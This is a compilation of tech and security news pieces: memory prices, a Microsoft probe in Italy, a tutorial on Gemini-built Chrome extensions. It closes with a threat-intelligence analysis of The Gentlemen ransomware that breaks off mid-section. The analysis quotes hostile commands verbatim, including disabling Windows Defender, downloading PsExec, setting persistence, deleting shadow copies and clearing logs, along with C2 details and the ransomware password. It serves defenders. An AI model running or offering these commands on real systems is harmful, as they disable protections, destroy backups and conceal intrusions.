Kategorie

WhatsApp on Monday officially announced the start of global reservations of usernames with an aim to protect the privacy of more than three billion users on the messaging platform. The optional feature is designed to help users connect with someone on the service through usernames, as opposed to directly sharing their phone numbers. Username reservations will start rolling out starting today, Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

Apple’s ongoing problems with RAM shortages and higher prices won’t be solved anytime soon, because rapidly accelerating demand for high-end AI memory is devouring the consumer electronics industry. 

GoPro has already warned it might go out of business — and the scale of the crunch has prompted analysts to call it an “absolute existential crisis” for smaller tech firms.

An endless night

The whole issue might get worse. Noted Apple analyst Ming-Chi Kuo believes the supply/demand crisis will deepen through 2027. He expects up to 20% of the remaining memory manufacturing capacity currently going to consumer electronics could be diverted to feed data centers in the coming year. That’s a message of doom to smaller firms, and the Android market will be eaten up. 

It’s lazy thinking to see Apple as a villain in this scenario. The company might have been charging more for add-on memory than market rates, but there were real technical reasons to do so. And while critics might be castigating Cupertino for those past practices, they’ll still find themselves now paying more for whatever brand of electronic devices they use to write their screeds on in future.

It’s all about supply and demand. Memory manufacturers see the opportunity to feed AI need, even if it means sacrificing consumer markets as they do.

Cash through chaos

You can argue that the consequences of that decision are unethical. Should memory makers have considered the consequence of curtailed supply on their existing markets? After all, every business, every school, and almost every consumer is now a digital entity, and the massive increase in PC, smartphone, and other consumer electronics prices will have a consequential impact across all layers of society.

It generates yet another inflationary pressure (as if more is needed) on the global economy, and the decision to further limit supply of consumer electronics memory could be seen as corporate irresponsibility. That’s partly why a class action against the big three memory makers (Samsung, SK Hynix, and Micron) has been filed in California. Between them, those three firms control around 90% of global memory supply, giving the trio colossal market power.

It’s a real power imbalance. 

This is market power

GoPro is typical; as a smaller vendor, there isn’t much it can do to save itself. Apple has more clout, so it might be able to forge a way forward. But even then, it’s rowing against what CEO Tim Cook has already called “a hundred-year flood.”

So even if the company can convince the Trump Administration to let it secure memory from currently embargoed Chinese manufacturer ChangXin Memory Technologies, the move is unlikely to ease the pressure much at all.  “Tim Cook is one of the few tech leaders who can still navigate both Washington and Beijing, so this is better handled before he steps down as CEO,” wrote Ming-Chi Kuo. That’s true, though Cook will continue “engaging with policy makers” once he takes on his new role as executive chairman of Apple’s board of directors in September.

Apple will likely also be speaking with partners to explore the possibility of investing in additional fabrication plants together (or building its own, given it has its own stable of experts quite capable of doing so). But even if those talks come to something, it will be years before they enter operation. Sadly, manufacturing investment from the existing big memory firms seems focused on data centers.

The shortage will continue until morale improves

What happens now? Short of any direct intervention to change the situation, memory prices will continue to accelerate. Jefferies Equity Research warns they will rise up to 50% in Q3 and an additional 30% to 40% by the end of 2026. They’ll also continue to increase next year, by which time some new production capacity might begin to come on stream. 

The scale of these price increases means no one can know whether Apple’s most recent product price increases (and the looming iPhone price increases in fall) will cover the full extent of the anticipated memory price hike. 

Will we see prices fall if memory price inflation eases off? History says we’re unlikely to see AI-flation go in reverse, but it’s not completely impossible. Meanwhile, businesses everywhere will struggle with unexpected hardware cost increases that are impossible to plan for. You can also anticipate some smaller vendors exiting the market, leaving companies who might have deployed those products across their business exposed, as software updates and hardware repairs will cease.

Yes, AI has already changed the world – it’s more expensive

They told us AI would change the world. It appears to be doing so by making everything more expensive. 

While there will still be opportunity to generate cash through this chaos, it’s far from delivering the kind of stable, business-friendly environment most governments rely on to balance their books.  In the end, all of this calls to mind the 2002 DRAM price fixing scandal, the only difference being that the consequences are much greater in this digital-everything age. 

Please join me on social media at BlueSky,  LinkedIn, or Mastodon, and do subscribe my daily human-curated Apple news headline summary on Substack.

The U.S. Department of State is offering up to $10 million for information that helps identify or locate members of the UNC5792 and UNC4221 hacker groups, which are linked to Russia's intelligence and military services. [...]

The China-aligned espionage group Mustang Panda is running two campaigns against the Indian government and hydropower targets, deploying new malware and turning a legitimate cloud service into its command channel. Acronis Threat Research Unit found active compromises inside Indian government networks, including machines used by senior administrative staff, and worked with Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

This week was a reminder that attackers do not always need big tricks. One small mistake, one old access path, one missed patch, and suddenly the door is open. The noise is not all noise, either. Forums are talking, researchers are finding easy cracks, and defenders have more cleanup waiting. Here’s the full Monday recap. ⚡ Threat of the Week New DirtyClone Linux Kernel Flaw Lets Local Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

The Linux Foundation has officially launched Akrites, a coordinated industry initiative designed to improve how critical open source vulnerabilities are validated, coordinated, and disclosed before patches reach downstream users.   Backed by a diverse coalition—including AWS, Google, Microsoft/GitHub, Red Hat, NVIDIA, and OpenAI—Akrites establishes a shared Security Incident Response Team (SIRT) to streamline the validation, remediation, and disclosure of vulnerabilities in the foundational c...

AI agents can access data, trigger workflows, and take action across enterprise systems. Token Security explains why governing these privileged identities is becoming essential for enterprise security. [...]

Hackers are exploiting a recently disclosed critical vulnerability (CVE-2026-48558) in SimpleHelp to deploy Djinn Stealer, a previously undocumented cross-platform information stealer targeting Windows, macOS, and Linux. [...]

Attackers have begun exploiting a critical vulnerability (CVE-2026-46817) in the Oracle E-Business Suite (EBS) financial application, according to threat intelligence company Defused. [...]

When a security alert fires, the panic often sets in before the analysis. Many administrators instinctively reach for /var/log/auth.log or journalctl, but those logs tell only a partial story. They document successful logins and authentication attempts, but they rarely capture the granular "how" of a post-compromise environment. To truly reconstruct an attack, you need to master audit logs. Unlike standard authentication logs, Linux audit logs (managed by auditd) record system-level activity,...

Italy’s competition watchdog has opened an investigation into Microsoft over concerns it may not have clearly informed consumers about the integration of Copilot and Designer into Microsoft 365 subscriptions, associated price increases, and automatic upgrades to higher-cost plans.

The Italian Competition Authority (AGCM), in a statement to the press, said it had opened an investigation into Microsoft S.r.l., the vendor’s Italian subsidiary, and Microsoft Ireland Operations Ltd. to assess whether the way the changes to M365 pricing were communicated may have unduly restricted consumers’ freedom of choice.

Although the AGCM’s announcement does not explicitly identify the pricing event under investigation, its description aligns with Microsoft’s January 2025 rollout of Copilot and Designer for Microsoft 365 Personal and Family subscribers.

At the time, Microsoft announced its first price increase for the consumer subscriptions since the launch of Copilot and Designer, stating that existing subscribers would pay the higher price at their next renewal after the AI features were added.

Could scrutiny spread beyond Italy?

The Italian probe is not the first time Microsoft’s communication around AI-related Microsoft 365 pricing has drawn regulatory attention.

The investigation follows earlier scrutiny of Microsoft’s consumer pricing communications in Australia and New Zealand, where Microsoft apologized and revised some of its messaging after regulators raised concerns over how AI-enabled Microsoft 365 subscriptions were presented to customers.

That episode could prove relevant for the current investigation, even though the legal frameworks differ, said Pareekh Jain, principal analyst at Pareekh Consulting.

“Microsoft’s apology and revised communications show similar concerns were raised before,” the analyst said.

“While the legal cases differ, Italian regulators may see it as evidence that clearer customer communication was already known to be necessary,” he added.

Jain also expects regulators elsewhere to watch the outcome of the Italian investigation: “Regulators in the EU, UK, Australia, New Zealand, and Canada are likely to watch closely, especially where AI is bundled into existing subscriptions with higher prices or automatic renewals.”

Enterprise buyers are likely to scrutinize AI pricing more closely

Whether the Italian investigation ultimately results in penalties against Microsoft remains to be seen, but analysts say the probe could have an impact on M365 commercial plans, which are separate and set to take effect on July 1.

The investigation serves as a reminder for enterprises to examine AI-related price changes even if Microsoft’s commercial licensing process seems more transparent than its consumer subscription model, Jain said. “CIOs should still verify what is changing at renewal and whether AI features are optional.”

Enterprise procurement teams should ask tougher questions during negotiations, said Bhupendra Chopra, chief revenue officer at IT consulting firm Kanerika.

“Procurement teams should ask questions, such as what AI am I paying for, can I see it itemized, and can I decline it without losing the rest? Buyers would be right to want AI pricing written into renewal terms with clear opt-outs and price protection,” Chopra said.

These questions, according to Jain, could provide additional leverage during licensing discussions to negotiate flexible terms.

However, Chopra pointed out that the investigation is symptomatic of a broader tension between software vendors’ efforts to integrate AI into existing products and regulators’ expectations around transparency and customer choice.

“Building AI into existing products and pricing it in is becoming standard across software, not unique to one vendor. Regulators are testing an old question against a new feature — whether buyers were given clear information and a real choice,” the analyst said.

For enterprises, the analyst added, the practical takeaway is straightforward: “Expect AI to show up inside the tools you already own, expect it to carry a cost, and review what each renewal actually includes. Treated as routine cost discipline, it stops being a surprise.”

Microsoft said it is committed to complying with Italian consumer law and will cooperate with the Italian Competition Authority in its preliminary investigation.

Business email compromise attacks increasingly rely on convincing impersonation rather than malware, making them harder for employees and traditional email defenses to detect. This webinar explores how behavioral AI can help identify sophisticated email threats and automate response workflows. [...]

New findings unearthed by Infoblox show that more than 236,000 websites are using investment scam templates built using a legitimate Chinese open-source, cross-platform application development framework called DCloud Uni-App. The templates power bogus cryptocurrency exchanges, multi-language pig-butchering operations, WhatsApp phishing networks, fake gambling platforms, brand-impersonation Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

Today’s encrypted data, such as credentials, may no longer remain confidential in the future because the public-key cryptography protecting it will soon be broken by quantum computers. Although no machine today can break elliptic curve cryptography or RSA, quantum hardware is advancing rapidly and will inevitably change how organizations protect their data. Ciphertext and credentials captured [email protected]

A Russian advanced persistent threat (APT) group has continued to evolve and expand its malware arsenal as part of its ongoing cyber onslaught against Ukraine throughout 2025. Slovakian cybersecurity company ESET said it observed 35 distinct spear-phishing campaigns mounted by Gamaredon against new targets, with most of them taking place in the second half of the year. Primary targets of these Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

Reading about the “revolutionary” nature of generative AI technology these days, it’s hard not to feel a little left out.

Sure, services like Google’s Gemini and its contemporaries can be useful in certain limited, specific areas for productivity purposes. But working with them can also be pretty disheartening and overwhelming — from prompt fatigue and an onslaught of AI workslop to the fear of lost jobs and even just the simple inconsistencies and inaccuracies these systems are so prone to providing. (And that’s to say nothing of the ever-increasing creepy factor that often accompanies this type of technology.)

More and more, it seems the most significant impact of these systems is in areas like coding, where AI is allowing ambitious tech-heads to create their own custom programs with limited to no programming knowledge (but a lot of time, vision, and patience) — as well as allowing accomplished coders to produce products more quickly by letting AI do the dirty work and then spending their time guiding, tweaking, and correcting its output.

That’s all well and good, but the reality is that most of us mere mortals are never gonna mess with anything that daunting. That doesn’t, however, mean we can’t enjoy a slice of the custom-coding pie and the productivity advantages it offers — on a much simpler but still supremely useful level.

The average-worker answer lies in an oft-overlooked middle-ground possibility these AI chatbots possess to help us create relatively basic but extremely high-potential custom browser extensions. As their name suggests, these simple little programs run entirely in your browser — the same exact sorts of add-ons you’d typically find and install in a marketplace like Google’s Chrome Web Store.

But with Gemini or any other similar genAI platform, you can dream up your own web-improving extension and turn it into reality in a matter of minutes — simply by describing your goal and then guiding the AI gently along the way. And given how much time most of us spend on the web these days, that opens up a tantalizing series of doors for taking total control of your work environment.

Hate all the extraneous bells and whistles gunking up the Google Docs interface? Gemini can create a Chrome extension that removes them. Annoyed by a glitchy web app? Ask Gemini for an extension that makes some under-the-hood improvements. The possibilities are endless.

Let me show you how exactly it works, how easy it is to approach and master, and how many work-enhancing possibilities are out there just waiting to be created.

The ins and outs of Gemini’s custom Chrome extensions

First things first: You don’t need any special tools or subscriptions to make this happen. For the purposes of this article, we’ll focus on Google’s Gemini for the creation and the standard desktop Chrome browser for the installation — but the same basic process would work with most any AI chatbot, if you happen to prefer ChatGPT or Claude, as well as with any extension-supporting, Chromium-compatible browser (a list that includes everything from Microsoft Edge to Brave, Vivaldi, and beyond).

Google offers a dizzying array of Gemini modes and options and an equally overwhelming series of AI subscription plans that control how much you can use those capabilities, but you don’t need to worry about any of that to create custom Chrome extensions. You might sometimes see better results if you switch your Gemini model to “Pro” or your Gemini thinking level to “Extended” — designations that even Gemini itself has trouble deciphering (believe me, I asked!) — but just using the default Gemini settings with a free Google account will generally work quite well.

Getting going with a custom Chrome extension is as simple as opening up a new Gemini chat and telling the system what you want it to cook up for you. The hardest part is deciding what you want and what’d be helpful for you — something we’ll explore more in a moment, via specific examples and suggestions. Once you’ve got that, you can just ask Gemini to create a Chrome extension that’ll accomplish what you’re envisioning, with as much specificity as possible about what it’ll do and how it’ll look.

Gemini will spit back a series of plain-text code chunks with instructions to copy each cluster and paste it into a new plain text file with a certain specific name — things like “manifest.json,” “content.js,” and “styles.css.” All you’ll do is use the on-screen button to copy each segment, then open up any simple text editor (like Windows Notepad, macOS TextEdit, or any number of simple online text editors) and paste the text in, then save it under the name Gemini gives you.

You’ll need to put all the files into a single isolated folder on your computer, and then you can go into Chrome, type chrome:extensions into its address bar, and install your shiny new creation by:

• Flipping the toggle next to “Developer mode” in the upper-right corner of the screen into the on and active position, if it isn’t already
• Clicking the “Load unpacked” button
• And selecting the folder you just created in the pop-up that appears

Chrome’s “Developer Mode” toggle and “Load unpacked” button are the keys to importing any extension you create.

JR Raphael / Foundry

And that’s pretty much it: No complicated compiling or program publishing — the extension you envisioned will be alive and working right in your browser and ready to use.

Now, odds are, it won’t be exactly what you wanted in its first iteration, and you’ll have to go back to Gemini to request several rounds of updates and corrections. Each time, Gemini will create a new set of code chunks, and you simply overwrite the text in each file with its corresponding new code chunk.

It’s still a bit of a process. But you’ll rarely spend more than an hour on something simple and maybe a few hours on something especially multifaceted and specific, and whatever you create will then work to your advantage indefinitely from that point onward, on any computer where you install it.

Before we dive into specific slivers of inspiration, let’s just note the hopefully obvious asterisk that this’ll work only if you’re either (a) using a personal computer that isn’t associated with an organization or (b) using a work-connected computer where custom Chrome extensions are permitted. In either scenario, you’ll want to use your own best judgment to ensure that whatever you’re adding into your browser won’t expose any corporate data or cause your IT comrades any alarm if they see you using it in your workday.

With most common examples, though — including all the ones we’re about to go over — you shouldn’t have any problem or cause for concern.

Capisce? Capisce. Let’s get into it.

Custom extension category #1: The interface fixer

Our first custom Chrome extension category is the one that won me over to this practice initially and has been the most shapeshifting for my own browser-based workflow — and that’s the simple-seeming but transformational ability to have AI remake any web app you rely on to remove unneeded elements and redesign the interface to your exact specifications.

The best example I can show you is what I did with my completely homemade, Gemini-created Docs Zen extension. Google Docs, to put it mildly, has devolved into a cluttered mess. There are so many on-screen elements I never use and, ironically enough, irrelevant AI elements I’d rather not have in my hair. I just want a calm, simple, minimalist environment for writing — with Google’s second-to-none syncing, universal access, and collaboration systems beneath it.

So rather than try to reinvent the wheel, I described to Gemini all the elements I wanted to remove from Docs and all the ways I wanted to rethink how its interface appeared for me.

My original request to Gemini, followed by rounds of expansions and revisions (and eventually also a more poetic name).

JR Raphael / Foundry

I went back and forth with numerous iterations and kept coming up with interesting new additions to further flesh out and improve the experience — and I ended up with a delightful setup that gives me a distraction-free view of my writing space with a simple toggle to reveal the main Docs menus and a palette icon that allows me to switch from one eye-pleasing theme to another.

width="620" height="161" sizes="auto, (max-width: 620px) 100vw, 620px">

Google Docs with my custom Docs Zen extension — a true delight for daily writing.

JR Raphael / Foundry

My setup deliberately doesn’t include comments or other collaborative elements, as I’m mostly writing by myself these days — but when I do need those elements, the eye icon in the upper-right corner of the screen disables my custom adjustments and takes me back to the standard Docs interface. I can then click the eye icon again in that environment to switch back.

My custom extension includes a simple on-off toggle for times when I need the full Docs setup.

JR Raphael / Foundry

I used Gemini to create something similar for Trello, with which I also have a love-hate relationship — loving the foundational functions and easy access everywhere but hating the interface that’s lost focus, gained bloat, and gotten noticeably clunky and slow over time.

With the same sort of step-by-step, plain-English guidance, I was able to transform Trello from this…

Trello, in its typical current-day state.

JR Raphael / Foundry

…into this:

Trello, with my custom modifications in place.

JR Raphael / Foundry

I couldn’t even begin to recount the number of superfluous features and elements I’ve removed, along with revamping the overall interface to make it both more efficient and more visually pleasing to my eye.

Whether it’s a web app you rely on regularly or even just a website you open often, the possibilities are practically endless for the ways you can reshape it and mold it to make it work better for you.

Speaking of which…

Custom extension category #2: The feature creator

In addition to the surface-level adjustments and feature removals in my aforementioned Trello-enhancing extension, I also added in several components — such as one-click buttons for archiving or moving cards — and I managed to speed up the site by making some under-the-hood adjustments Gemini suggested when I asked about its choppy performance. The same sort of concept can apply to any web-based interface you’re using, if there are any options that are annoyingly buried within menus, shortcuts that’d make your life easier, or other improvements you’ve longed to see.

You can also consider some simple standalone extensions for giving yourself on-demand features that aren’t necessarily associated with any one specific website but could be useful in plenty of productivity scenarios. For instance:

• I do a fair amount of basic image editing and frequently find myself needing to reference a hex color code that corresponds with a particular brand color, and I always end up having to open up a new tab and look in a note somewhere to find the code I need. Well, no more: I used Gemini to create a super-simple custom color code pop-up where I can store all the colors I need and then copy any of ’em onto my clipboard with a single click. Major time-saver.

All the color codes I need are now never more than a couple clicks away.

JR Raphael / Foundry

• I’m also constantly converting time zones, either for meetings with clients or colleagues or for trying to wrap my head around publishing systems that insist on using random time zones with no meaning to me. It’s infinitely easier for me to manage now, thanks to the custom Chrome extension I made that shows the current time in all the zones I need most often — as well as allowing me to put any other time into any field and have all the other zones instantly adjust to match. It also offers a brilliant plain-text conversion box where I can just type things like “1pm-3pm PT in MT” and have it cough back up an instant answer for any conversion I need.

My custom time zone conversion extension comes in handy countless times a day.

JR Raphael / Foundry

Maybe what you want is the ability to interact with data on different websites more easily — to be able to save any table on a page in front of you as a CSV file, mayhap, or even to save any text you highlight on a page into a new Google Docs document. Whatever the case may be, Gemini can handle it — and that superpower that you’ve always wished for but never found the right tool to make possible can actually now be yours.

Custom extension category #3: The browser expander

Our final category of custom Chrome extensions to consider moves beyond the web itself and into your actual browser. The browser is essentially the modern-day desktop, after all — and for the first time now, you can expand and enhance it in all sorts of interesting ways.

Some specific examples, to get your brain-motor whirring:

• You could walk Gemini through creating a smart auto-snooze system for your open browser tabs, both to clear clutter and help with Chrome’s performance. It could save any tab that hasn’t been touched in a certain amount of time to your local storage and then give you a simple searchable “Archive Dashboard” where you can find all those auto-closed tabs and re-open ’em as needed.
• With the right guidance, Gemini could give you a custom browser research panel — where any info you highlight on a page gets beamed over into a sidebar-style panel that serves as a running scratchpad of notes from the day.
• Or, if you find yourself often needing to see two tabs together side by side, you could have Gemini cook up a custom extension that instantly detaches any tab in front of you and puts it into a new tab window in a perfectly sized and spaced pattern. One keyboard shortcut could make that move happen, while another keyboard shortcut could recombine the two tabs into a single centered window.

As with all the other ideas we’ve gone over, all you’ve gotta do is ask — and now, with the right inspiration in mind, you’re ready to get your custom extension adventures going and start bending the web to your will.

The U.S. Justice Department's Criminal Division has seized nearly 400 web domains used for illegally streaming matches at the FIFA World Cup. [...]

Introduction

This year saw the emergence of The Gentlemen, a prominent example of a group operating under the ransomware-as-a-service (RaaS) model. Although our initial assessment suggested the group first appeared in mid-2025, it actually started ramping up its activities at the beginning of 2026. According to public reports, in the first half of 2026, this group ranks among the top 10 ransomware actors by the number of victim announcements on its data leak site (DLS).

We have been observing the activity of The Gentlemen since February 2026 and have discovered new tactics, techniques, and procedures (TTPs) as well as custom tool development efforts, as they target large corporations and critical infrastructure worldwide. In our research, we have uncovered the group’s methods of reconnaissance, network sniffing, and many other techniques that have not been publicly described before by the wider community.

Technical details Initial infection vector

The Gentlemen group and its affiliates usually get into victim systems by exploiting vulnerabilities in online services and using stolen or weak login credentials, as reported by multiple cybersecurity vendors. They often target devices like hardware VPNs and firewalls that are exposed to the internet, and use leaked or default credentials to gain access.

We believe the group is likely collaborating with other actors or initial access brokers (IABs) to gain access to the target organizations. While they often deploy ransomware within a few hours after initial access is obtained, our analysis of several attacks revealed some cases, in which access to the victim’s system had been established long before the ransomware was deployed. These cases involved tactics that are not typically associated with the group. This suggests that the initial breach may not have been executed by The Gentlemen at all, but rather by another group or an initial access broker.

Reconnaissance

Our investigation reveals that The Gentlemen conduct thorough internal reconnaissance using tools like SharpADWS, NetScan, Advanced IP Scanner, and netsh to map the target environment and identify vulnerabilities. SharpADWS is used to gather detailed Active Directory information, including domain object enumeration, and can bypass standard logging by wrapping LDAP queries in SOAP messages. The group also uses NetScan and Advanced IP Scanner to scan the network, discover active ports and services, and identify potential vulnerabilities, ultimately gaining a deeper understanding of the network and establishing remote control over identified systems.

Microsoft’s netsh tool is used to capture network packets and gather intelligence, executing the command cmd.exe /Q /c netsh trace start capture=yes report=no filemode=circular overwrite=yes maxSize=4 > \<target IP>\ADMIN$\{RANDOM-FILE-NAME} 2>&1 to start the capture, and cmd.exe /Q /c netsh trace stop > \<target IP>\ADMIN$\{RANDOM-FILE-NAME} to stop it.

The captured data is saved to a shared administrative folder with a random name, and can be analyzed with tools like Wireshark to reveal sensitive information such as unencrypted network activity and potential passwords, which the attackers then use to conduct targeted ransomware attacks.

Lateral movement

The Gentlemen group leverages the NETLOGON share to distribute the ransomware executable to connected computers, enabling simultaneous attacks on multiple devices. To facilitate lateral movement, they use a customized PowerShell script, deploy_gpo.ps1, with specific parameters and variables for each target system. Additionally, they employ PsExec to remotely execute the ransomware binary on targeted systems, providing an alternative method for spreading the infection when the GPO-based approach is not feasible.

Disabling security products

The Gentlemen group uses various methods to disable security software on targeted computers, including the BYOVD technique. This involves installing a vulnerable driver and exploiting its weakness to shut down security software, gain unrestricted access, and launch ransomware attacks. We observed the following vulnerable drivers used in the group’s attacks.

Driver name Description ProcessMonitorDriver.sys Safetica DLP and EDR driver wamsdk.sys WatchDog anti-malware driver gamedriverx64.sys Fedeen/Hotta studio anti-cheat driver biontdrv.sys Paragon partition manager driver inpoutx64.sys A legacy driver involved in managing RGB lighting wsftprm.sys Topaz anti-fraud software driver Havoc.sys Huawei audio driver

The Gentlemen group also uses open-source tools, including Windows Kernel Explorer and OpenArk64, to disable security software. These tools can intercept and block system calls, and even remove security drivers, allowing the attackers to bypass security measures and remain undetected.

Besides this, the group employs simple methods to disable security software, such as using kavrmvr.exe to uninstall Kaspersky Antivirus, which is prevented by the product’s behavioral detection, and modifying Windows registry settings to disable Windows Defender’s real-time protection.

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender] "DisableAntiSpyware"=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection] "DisableBehaviorMonitoring"=dword:00000001 "DisableOnAccessProtection"=dword:00000001 "DisableScanOnRealtimeEnable"=dword:00000001

Last but not least, the attackers attempt to disable Windows Defender’s real-time monitoring and ransomware protection, and add itself to the exclusion list, by executing multiple PowerShell cmdlets, as observed in the Go implant, which we’ll analyze later in this post:

Set-MpPreference -DisableRealtimeMonitoring $true -Force Set-MpPreference -EnableControlledFolderAccess Disabled -Force Add-MpPreference -ExclusionProcess <file_name> Add-MpPreference -ExclusionPath 'C:\\'

Go-based backdoor

We observed a custom-made implant, written in Go and deployed a day before the ransomware attack, which acted as a backdoor, enabling remote command execution. The implant collected system information (hostname, domain name, UUID, and local IP addresses) and organized it into a JSON format using a map structure with keys like name, domain, uuid, and localIPs. To obtain the system’s UUID, it used the WMI query "SELECT UUID FROM Win32_ComputerSystemProduct". It then used the Yamux library to establish a persistent bidirectional TCP connection with the C2 server at 81.177.215[.]15:9443. It sent the collected system info to the C2 and waited for operator responses, executing commands using cmd.exe /c if the response byte was 'c', or establishing a SOCKS proxy connection if the byte was 's'. This functionality likely enables The Gentlemen’s red team to pivot within the target network and expand their scan coverage.

Given the backdoor implant’s capabilities, such as establishing two-way communication, executing commands, setting up a SOCKS proxy, and gathering information, it’s clear that it can also be used to expand the attack chain as needed. In one incident, soon after the initial connection was made, we saw the server send reconnaissance commands, including:

whoami net group \"Domain Admins\" /domain net group dir c:\\ cd c:\\

Go-based ransomware

The most widespread version of the ransomware binary, written in Go, emerged in mid-2025 and has been used in most attacks since then. It features a previously unknown Go obfuscator that renames symbols, source code files, and structures, and alters function signatures, making analysis more difficult. The binary also contains embedded parameters with descriptions, indicating a sophisticated tool. The parameters are listed in the following table:

Parameter Description --password Access password required to run the ransomware, acts as an anti-sandbox technique --path Comma-separated list of target directories to be encrypted --T Delay before the encryption starts, specified in minutes --system A flag to run as SYSTEM, encrypting only local drives --shares A flag to encrypt only mapped network drives --full A flag that combines --system and --shares --spread Lateral movement flag using specified domain credentials (“domain.com\user:pass”) or a single space (” “) to leverage the current session --gpo A flag to deploy via Group Policy to all domain computers (designed to be executed on a Domain Controller) --silent Silent mode: skips renaming files, modifying file update times after encryption, and changing the wallpaper --keep A flag that prevents the executable from self-deleting after the encryption process completes --wipe A flag that enables wiping free disk space after encryption --no-admin A flag to force execution without administrative privileges –fast Speed flag that restricts processing/encryption to 9 percent of the file –superfast Speed flag that restricts processing/encryption to 3 percent of the file --ultrafast Speed flag that restricts processing/encryption to 1 percent of the file Automated system execution prevention

The Go variant of the ransomware is designed to avoid detection and prevent analysis. To execute, it requires a password, currently set to CbdU8EgF. This password acts as a barrier to prevent the binary from running in sandbox or automated environments. If the incorrect password is entered or no password is provided, the binary will terminate.

Lateral movement through GPO deployment

When the --gpo parameter is used, the ransomware spreads to other computers on the network through Group Policy. To do this, it generates PowerShell commands based on the target environment, writes them to a file called deploy_gpo.ps1 in the %temp% folder, and executes it.

The resulting script allows the attackers to quickly spread the ransomware across the entire company network. It starts by finding the Domain Controller and loading tools to control it. Then, it copies itself to the NETLOGON network folder to become accessible to all computers.

To prevent the attack from being blocked, the script creates a fake system update policy that disables Windows Defender. It does this by changing the DisableRealtimeMonitoring setting to 1 on all connected computers, thereby disabling real-time scanning and security features. The script also sets up a hidden task by creating a ScheduledTasks.xml file in the SYSVOL directory and modifies the Active Directory property gPCMachineExtensionNames to register the malicious XML file. Finally, the script forces all computers on the network to update their rules immediately by running the gpupdate /force command, causing all computers to download and run the ransomware simultaneously.

Lateral movement through PsExec

In addition to spreading through Group Policy, the ransomware also uses PsExec for lateral movement when the --spread parameter is provided. If PsExec is absent on the target system, it downloads the tool using the following command:

powershell.exe -Command "Invoke-WebRequest -Uri 'https://live.sysinternals[.]com/PsExec.exe' -OutFile 'C:\Temp\psexec.exe'"

The ransomware then performs a thorough scan of the domain by installing and using Remote Server Administration Tools (RSAT) through a PowerShell cmdlet. If the PowerShell commands fail, it uses the NetServerEnum API instead.

try { Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -ErrorAction Stop } catch {} try { DISM.exe /Online /Add-Capability /CapabilityName:"Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" } catch {} try { Install-WindowsFeature RSAT-AD-PowerShell -ErrorAction Stop } catch {} try { Import-Module ActiveDirectory -ErrorAction Stop Get-ADComputer -Filter * | Select-Object -ExpandProperty Name } catch {}

Once it has obtained a list of all computers on the domain, the ransomware checks if each computer is active by pinging it with the command ping.exe -n 1 -w 500 {target}. If a computer is found to be active, the ransomware uses PsExec to spread to that computer.

Pre-encryption activities

Before starting to actually encrypt files, the ransomware attempts to stop any active Hyper-V virtual machines, allowing it to encrypt the virtual disk files. It uses PowerShell commands to achieve this, including:

Get-VM | Stop-VM -Force -TurnOff Get-VM | Where-Object State -eq 'Running' | Stop-VM -Force -TurnOff

The ransomware also terminates specific processes using taskkill.exe and disables and stops certain services using sc.exe. The lists of processes and services are quite long and include various popular software, such as Microsoft Office instances, database management interfaces, remote management software, backup applications and more.

After stopping and terminating all the services and processes from the lists, the ransomware ensures its persistence on the system by:

• Deleting and recreating a scheduled task called “UpdateUser” to run the ransomware on startup
• Adding a registry key to run the ransomware on startup

The commands used for this are:

schtasks.exe /Delete /TN "UpdateUser" /F schtasks.exe /Create /SC ONSTART /TN "UpdateUser" /TR "<ransomware_path>" reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GupdateS" /t REG_SZ /d "<ransomware_path>" /f

Encryption process

After completing its preparations, the ransomware begins encrypting files using a hybrid encryption algorithm that combines Curve25519 and the XChaCha20 stream cipher. For each file to be encrypted, it generates a Curve25519 key pair and computes a shared secret with the attacker’s public key embedded in its code and encoded in Base64 as HvzC6Dq/siFthWSgE5ozZyQDu9cyxIoxb3NuRHI6pDM=.

Before encrypting the files, the ransomware changes the file access permissions to “Everyone” and gains full administrative access by overriding the file’s Access Control List (ACL) and Access Control Entry (ACE) using the following commands:

• takeown.exe /f <target_file> /d y
• icacls.exe <target_file> /grant *S-1-1-0:F

The ransomware also includes a list of blacklisted directories, files, and extensions to prevent encryption of essential system components.

As the encryption process begins, the ransomware creates a file named README-GENTLEMEN.txt in each directory, containing the ransom note with the victim ID, Tox ID, and Data Leak Site address. If the --silent parameter is not provided, it also changes the desktop wallpaper to The Gentlemen’s embedded image.

The Gentlemen background image

After completing its operations, the ransomware may delete free space on the system to hinder data recovery attempts if the --wipe parameter is provided. Additionally, it may delete itself if the --keep parameter is not provided.

Regardless of provided parameters, it also deletes various system files and logs to cover its tracks, using commands such as:

vssadmin.exe delete shadows /all /quiet wmic.exe shadowcopy delete wevtutil.exe cl System wevtutil.exe cl Application wevtutil.exe cl Security

Additionally, it deletes files from various directories, including:

cmd.exe /C del /f /q C:\Windows\Prefetch\*.* cmd.exe /C del /f /q C:\ProgramData\Microsoft\Windows Defender\Support\*.* cmd.exe /C del /f /q %SystemRoot%\System32\LogFiles\RDP*\*.* cmd.exe /C rd /s /q C:\$Recycle.Bin

C-based ransomware

As The Gentlemen’s operations have extended, multiple researchers from different information security vendors have identified two ransomware implant versions: the cross-platform Go variant described above and a C-based ESXi locker for Linux. Our investigation has also uncovered a new, still-in-development C implant, currently limited to Windows.

This new ransomware variant has been observed in a limited number of attacks on organizations. While the overall malware structure remains similar to the Go variant we have described, the encryption algorithm has undergone significant changes, suggesting The Gentlemen group is expanding its capabilities. We believe this variant is still in development and being tested on a small subset of victims, with several parameter options, outlined below.

